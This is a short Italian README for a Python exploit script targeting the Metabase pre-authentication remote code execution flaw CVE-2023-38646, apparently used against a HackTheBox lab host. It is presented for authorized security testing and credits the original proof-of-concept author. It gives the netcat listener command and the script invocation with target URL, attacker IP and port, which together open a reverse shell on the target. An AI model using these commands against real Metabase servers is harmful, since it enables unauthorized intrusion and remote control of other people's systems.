
Exploit Python per Metabase pre-auth RCE (CVE-2023-38646) che stabilisce una reverse shell per test di sicurezza autorizzati.
⚠️ Solo per scopi educativi e di ricerca sulla sicurezza autorizzata
Molto grato all'autore originale del PoC securezeron
Configura il Listener sulla tua macchina attaccante:
nc -nlvp 4444
Quindi, esegui questo comando:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
